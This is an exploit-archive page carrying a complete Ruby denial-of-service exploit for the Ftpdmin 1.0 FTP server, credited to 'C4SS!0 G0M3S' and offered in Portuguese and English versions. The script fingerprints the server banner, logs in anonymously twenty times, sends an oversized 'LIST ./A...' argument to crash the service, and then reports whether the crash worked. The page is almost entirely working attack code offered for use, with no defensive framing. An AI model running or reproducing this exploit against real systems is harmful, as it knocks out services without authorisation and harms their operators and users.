Home / exploits Ftpdmin 1.0 Denial Of Service
Posted on 19 March 2011
#!/usr/bin/ruby # # #[+]Exploit Title: Exploit Denial of Service Ftpdmin 1.0 #[+]Date: 03142011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.softpedia.com/get/Internet/Servers/FTP-Servers/ftpdmin.shtml #[+]Version: 1.0 #[+]Tested On: WIN-XP SP3 Porguese Brazilian #[+]CVE: N/A #[+]Language: Portuguese and English # # # xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx # xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx # xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx # xxxxx xxx xxx xxx xxx xxx xxx xxxxxx # xxx xxx xxx xxx xxx xxx xxx xxxxxxxx xxxxxxxx xxxxxxxxx # xxxxxx xxx xxx xxx xxx xxx xxx xx xx xx xx xx # xxx xxx xxx xxx xxx xxx xxx xxx xx xx xx xxxx xx xxxxx # xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxx xxxxxxxx xx xx xx xx # xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx xxx xxxxxx xx xx xxxxxxxxx # # #Criado por C4SS!0 G0M3S #E-mail Louredo_@hotmail.com #Site www.exploit-br.org # # # require 'socket' require 'fcntl' # # #AQUI O EXPLOIT ESTA EM PORTUGUES #----------------------------------------- # def portuguese() def len(str) return str.length end sys = `ver` if sys=~/Windows/ system("cls") system("color 4f") else system("clear") end def usage() print """ ======================================================= ======================================================= ==========Exploit Denial of Service Ftpdmin 1.0======== ==========Autor C4SS!0 G0M3S=========================== ==========E-mail Louredo_@hotmail.com================== ==========Site www.exploit-br.org====================== ======================================================= ======================================================= """ end if len(ARGV)!=2 usage() print " [-]Modo de Uso: ruby #{$0} <Host> <Porta> " print " [-]Exemplo: ruby #{$0} 192.168.1.2 21 " exit(0) end usage() buf = "./A" * (150/3) host = ARGV[0] porta = ARGV[1].to_i print " [+]Conectando ao Servidor #{host}... " sleep(1) begin s = TCPSocket.new(host,porta) print " [+]Checando se o Servidor e Vulneravel " sleep(1) rescue print " [+]Erro ao se Conectar no Servidor " exit(0) end banner = s.recv(2000) s.close unless banner =~/Minftpd/ print " [+]Sinto Muito, o Servidor Nao e Vulneravel:( " sleep(1) exit(0) end print " [+]Servidor e Vulneravel:) " sleep(1) print " [+]Enviando Exploit... " sleep(1) i=0 while i<20 sock = TCPSocket.new(host,porta) sock.recv(2000) sock.puts "USER anonymous " sock.recv(2000) sock.puts "PASS anonymous " sock.recv(2000) sock.puts "LIST #{buf} " sock.close i+=1 end print " [+]Exploit Enviado com Sucesso " sleep(1) print " [+]Checando se o Exploit Funcionou " sleep(5) begin so = TCPSocket.new(host,porta) so.send("2000") print " [+]Sinto Muito,O Exploit Nao Funcionou:( " rescue print " [+]Parabens, O Exploit Funcionou com Sucesso:) " end end # #HERE THE EXPLOIT IS IN ENGLISH #---------------------------------- # def english() def len(str) return str.length end sys = `ver` if sys=~/Windows/ system("cls") system("color 4f") else system("clear") end def usage() print """ ======================================================= ======================================================= ==========Exploit Denial of Service Ftpdmin 1.0======== ==========Autor C4SS!0 G0M3S=========================== ==========E-mail Louredo_@hotmail.com================== ==========Site www.exploit-br.org====================== ======================================================= ======================================================= """ end if len(ARGV)!=2 usage() print " [-]Usage: ruby #{$0} <Host> <Porta> " print " [-]Exemple: ruby #{$0} 192.168.1.2 21 " exit(0) end usage() buf = "./A" * (150/3) host = ARGV[0] porta = ARGV[1].to_i print " [+]Connecting to Server #{host}... " sleep(1) begin s = TCPSocket.new(host,porta) print " [+]Checking if server is vulnerable " sleep(1) rescue print " [+]Error to Connect to Server " exit(0) end banner = s.recv(2000) s.close unless banner =~/Minftpd/ print " [+]I'm Sorry, the Server is not Vulnerable:( " sleep(1) exit(0) end print " [+]Server is Vulnerable:) " sleep(1) print " [+]Sending Exploit... " sleep(1) i=0 while i<20 sock = TCPSocket.new(host,porta) sock.recv(2000) sock.puts "USER anonymous " sock.recv(2000) sock.puts "PASS anonymous " sock.recv(2000) sock.puts "LIST #{buf} " sock.close i+=1 end print " [+]Submitted Exploit Success " sleep(1) print " [+]Checking if the Exploit Works " sleep(5) begin so = TCPSocket.new(host,porta) so.send("2000") print " [+]I'm Sorry, The Exploit Not Worked:( " rescue print " [+]Congratulations, The exploit worked with Success:) " end end def start() sis = `ver` if sis=~/Windows/ system("cls") system("color 4f") else system("clear") end begin f = File.open("lang.txt","r") file = f.gets.chomp if file == "1" portuguese() end if file == "2" english() end rescue print """ [+]Select Your Language: [+]Selecine Seu Idioma: 1 - Portugues 2 - English """ print " What Your Language? =>" lang = STDIN.gets.chomp print lang if lang == "1" f = File.open("lang.txt","w") f.write(1) f.close portuguese() end if lang == "2" f = File.open("lang.txt","w") f.write("2") f.close english() end end end if 10 == 10 start() end
